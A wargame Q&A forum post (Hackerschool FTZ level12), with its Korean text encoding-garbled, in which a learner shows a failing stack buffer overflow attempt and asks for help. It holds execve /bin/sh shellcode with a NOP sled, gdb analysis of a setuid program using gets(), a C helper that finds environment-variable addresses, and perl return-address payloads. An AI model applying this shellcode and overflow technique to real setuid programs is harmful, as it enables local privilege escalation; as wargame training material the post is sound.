|
http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=3250 [º¹»ç]
¾îµð¸¦ À߸øÇÑ°ÇÁö ¸ð¸£°Ú¾î¿ä ¤Ð¤Ð. ¸çÄ¥ °¾ß....
[level12@ftz tmp]$ echo -n $SHELLCODE | hexdump -C ;# SHELLCODE¶ó´Â ȯ°æº¯¼ö¿¡ NOP sled¸¦ Æ÷ÇÔÇØ ½©Äڵ带 ³Ö¾ú½À´Ï´Ù.
00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
000000c0 90 90 90 90 90 90 90 90 eb 1f 5e 89 76 08 31 c0 |..........^.v.1.|
000000d0 88 46 07 89 46 0c b0 0b 89 f3 8d 4e 08 8d 56 0c |.F..F......N..V.|
000000e0 cd 80 31 db 89 d8 40 cd 80 e8 dc ff ff ff 2f 62 |..1...@......./b|
000000f0 69 6e 2f 73 68 |in/sh|
000000f5
[level12@ftz tmp]$ gdb /home/level12/attackme ;# Àý´ë°æ·Î·Î gdb½ÇÇà. ¿©±â¼± µüÈ÷ Àý´ë°æ·Î°¡ Àǹ̰¡ ¾øÀ»Áöµµ...
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
(gdb) disass main
Dump of assembler code for function main:
0x08048470 <main+0>: push %ebp
0x08048471 <main+1>: mov %esp,%ebp
0x08048473 <main+3>: sub $0x108,%esp
0x08048479 <main+9>: sub $0x8,%esp
0x0804847c <main+12>: push $0xc15
0x08048481 <main+17>: push $0xc15
0x08048486 <main+22>: call 0x804835c <setreuid>
0x0804848b <main+27>: add $0x10,%esp
0x0804848e <main+30>: sub $0xc,%esp
0x08048491 <main+33>: push $0x8048538
0x08048496 <main+38>: call 0x804834c <printf>
0x0804849b <main+43>: add $0x10,%esp
0x0804849e <main+46>: sub $0xc,%esp
0x080484a1 <main+49>: lea 0xfffffef8(%ebp),%eax
0x080484a7 <main+55>: push %eax
0x080484a8 <main+56>: call 0x804831c <gets>
0x080484ad <main+61>: add $0x10,%esp
0x080484b0 <main+64>: sub $0x8,%esp
0x080484b3 <main+67>: lea 0xfffffef8(%ebp),%eax
0x080484b9 <main+73>: push %eax
0x080484ba <main+74>: push $0x804854c
0x080484bf <main+79>: call 0x804834c <printf>
0x080484c4 <main+84>: add $0x10,%esp
0x080484c7 <main+87>: leave
0x080484c8 <main+88>: ret
0x080484c9 <main+89>: lea 0x0(%esi),%esi
0x080484cc <main+92>: nop
0x080484cd <main+93>: nop
0x080484ce <main+94>: nop
0x080484cf <main+95>: nop
End of assembler dump.
(gdb) b main
Breakpoint 1 at 0x8048479
(gdb) b *main+61
Breakpoint 2 at 0x80484ad
(gdb) run
Starting program: /home/level12/attackme
Breakpoint 1, 0x08048479 in main ()
(gdb) i r eip
eip 0x8048479 0x8048479
(gdb) x/20x $esp+0x108
0xbffffa28: 0xbffffa48 0x40033917 0x00000001 0xbffffa74
0xbffffa38: 0xbffffa7c 0x4001582c 0x00000001 0x08048370
0xbffffa48: 0x00000000 0x08048391 0x08048470 0x00000001
0xbffffa58: 0xbffffa74 0x080482e4 0x08048510 0x4000c660
0xbffffa68: 0xbffffa6c 0x00000000 0x00000001 0xbffffb5d
(gdb) p 0xbffffa32 ;# À߸ø °è»êÇÑ °Ì´Ï´Ù;;
$1 = 3221223986
(gdb) p 0xbffffa28 + 4
$2 = 3221223980 ;# ÀÌ°Ô mainÀÇ ret°ª.
(gdb) c
Continuing.
¹®ÀåÀ» ÀÔ·ÂÇϼ¼¿ä.
abcdefghijklmn
Breakpoint 2, 0x080484ad in main ()
(gdb) x/40x $esp
0xbffff910: 0xbffff920 0x00000c15 0xbffff940 0x00000001
0xbffff920: 0x64636261 0x68676665 0x6c6b6a69 0x07006e6d
0xbffff930: 0xbffff9d0 0x40015a38 0x0029656e 0x00000000
0xbffff940: 0x400299c8 0x400160a8 0x00000000 0x00000000
0xbffff950: 0x00000000 0x00000000 0x00000000 0x4000807f
0xbffff960: 0x4001582c 0x00002005 0xbffff990 0xbffff9bc
0xbffff970: 0x4000be03 0x40016244 0x00000000 0x0177ff8e
0xbffff980: 0x4000807f 0x4001582c 0x00000059 0x40015a38
0xbffff990: 0xbffff9e0 0x4000be03 0x40015bd4 0x40016370
0xbffff9a0: 0x00000001 0x00000000 0x4002bdbd 0x40024a88
(gdb) p 0xbffff920
$3 = 3221223712 ;# ÀÌ°Ô str¹è¿ ½ÃÀÛ ÁÖ¼Ò°ª
(gdb) p $2 - $3 ;# µÑÀÇ Â÷¸¦ ±¸Çϸé
$4 = 268 ;# 268¹ÙÀÌÆ®°¡ ³ª¿À³×¿ä.
(gdb) p $4 / 4
$5 = 67 ;# 4¹ÙÀÌÆ®¾¿ ÁÖ¼Ò °ªÀ» ¾µ °Å´Ï±î 4·Î ³ª´³½À´Ï´Ù. ¿©±â´Ù +1À» ÇÒ °Ì´Ï´Ù.
(gdb) q
The program is running. Exit anyway? (y or n) y
[level12@ftz tmp]$ ./g SHELLCODE /home/level12/attackme ;# Âü°í·Î ½ÇÇàÆÄÀÏ Àý´ë°æ·Î·Î ½áµµ °°Àº °ªÀÌ ³ª¿Ô½À´Ï´Ù..
SHELLCODEÀÇ ´ëÃæ ¾î¸²ÀâÀº ¸Þ¸ð¸®ÁÖ¼Ò´Â 0xbffffb87¿¹¿°..
[level12@ftz tmp]$ cat ./g.c ;# ¼Ò½ºÄڵ嵵 º¸¿©µå¸±°Ô¿ä..
int main(int argc, char *argv[])
{
char* ptr;
if (argc < 3) { perror("getenvaddr [ȯ°æº¯¼ö À̸§] [´ë»ó ÇÁ·Î±×·¥]"); exit(1); }
ptr = (char*)getenv(argv[1]);
if ( !ptr ) { perror("ȯ°æº¯¼ö À̸§ÀÌ Æ²·È³ªºÁ¿ä. ¤Ð¤Ð"); exit(2); }
ptr += (strlen(argv[0]) - strlen(argv[2]))*2;
printf("%sÀÇ ´ëÃæ ¾î¸²ÀâÀº ¸Þ¸ð¸®ÁÖ¼Ò´Â %p¿¹¿°..\n", argv[1], ptr);
return 0;
}
[level12@ftz tmp]$ perl -e 'print "\xc7\xfb\xff\xbf"x68'|/home/level12/attackme ;# NOP sledµµ ÀÖÀ¸´Ï±î ȯ°æº¯¼ö ÁÖ¼Ò ±¸ÇÑ °ª¿¡ ³Ë³ËÀâ¾Æ +64ÇغýÀ´Ï´Ù.
¹®ÀåÀ» ÀÔ·ÂÇϼ¼¿ä.
Çûÿ¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?ÿ¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç?¿Ç??
[level12@ftz tmp]$ perl -e 'print "\xc7\xfb\xff\xaf"x68'|/home/level12/attackme
¹®ÀåÀ» ÀÔ·ÂÇϼ¼¿ä.
Çûÿ????????????????????????????????????????????????????????????????????????????????????????????????????????ÿ???????????????????????????????
¼¼±×¸àÅ×ÀÌ¼Ç ¿À·ù
[level12@ftz tmp]$ perl -e 'print "\xc7\xfb\xff\xaf"x67'|/home/level12/attackme ;# ¿©±â¿¡¼ ¼¼±×¸ÕÅ×ÀÌ¼Ç ¿À·ù°¡ ¶ß´Â °Ç SFP¶§¹®Àϱî¿ä?
¹®ÀåÀ» ÀÔ·ÂÇϼ¼¿ä.
Çûÿ????????????????????????????????????????????????????????????????????????????????????????????????????????ÿ?????????????????????????????
¼¼±×¸àÅ×ÀÌ¼Ç ¿À·ù
[level12@ftz tmp]$ perl -e 'print "\xc7\xfb\xff\xaf"x66'|/home/level12/attackme
¹®ÀåÀ» ÀÔ·ÂÇϼ¼¿ä.
Çûÿ????????????????????????????????????????????????????????????????????????????????????????????????????????ÿ???????????????????????????
[level12@ftz tmp]$ perl -e 'print "\xe7\xfb\xff\xbf"x68'|/home/level12/attackme ;# ¹ß¹öµÕÀÔ´Ï´Ù ¤Ð¤Ð
¹®ÀåÀ» ÀÔ·ÂÇϼ¼¿ä.
çûÿ¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?ÿ¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç?¿ç??
[level12@ftz tmp]$
¾îµð°¡ Ʋ¸° °ÅÁö¿ä.. Ä£ÀýÇÑ ´äº¯ ºÎŹµå¸³´Ï´Ù! Àý´ë°æ·Î¸¦ ½áµµ ÇØ°áµÇÁö°¡ ¾Ê¾Æ¿ä! |
Hit : 3291 Date : 2012/01/14 09:23
|
2844, 
5/143 
